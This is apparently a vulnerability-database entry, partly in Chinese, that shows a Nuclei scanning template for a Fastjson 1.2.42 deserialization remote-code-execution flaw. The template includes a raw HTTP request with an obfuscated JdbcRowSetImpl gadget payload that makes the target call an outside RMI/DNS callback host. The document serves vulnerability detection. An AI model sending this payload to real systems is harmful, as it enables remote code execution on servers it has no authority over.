fastjson-1-2-42-rce: Fastjson 1.2.42 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Fastjson | POC: 已公开

漏洞描述

Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability

PoC代码[已公开]

id: fastjson-1-2-42-rce

info:
  name: Fastjson 1.2.42 - Remote Code Execution
  author: zh
  severity: critical
  description: Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability
  reference:
    - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
    - https://github.com/wyzxxz/fastjson_rce_tool
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: fastjson,rce,deserialization,oast,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;",
           "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
           "autoCommit":true
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms DNS Interaction
        words:
          - "dns"

      - type: status
        negative: true
        status:
          - 200
# digest: 4a0a0047304502207db4615931d7f94caa74a72d602e1c3a360e90d2fcc2be9b9bc1701f66fa7f03022100e8937bb19a6f3cc0fdd91d211d270f1acb81feca90b49a9319296f77acac6118:922c64590222798bb761d5b6d8e72950

相关漏洞推荐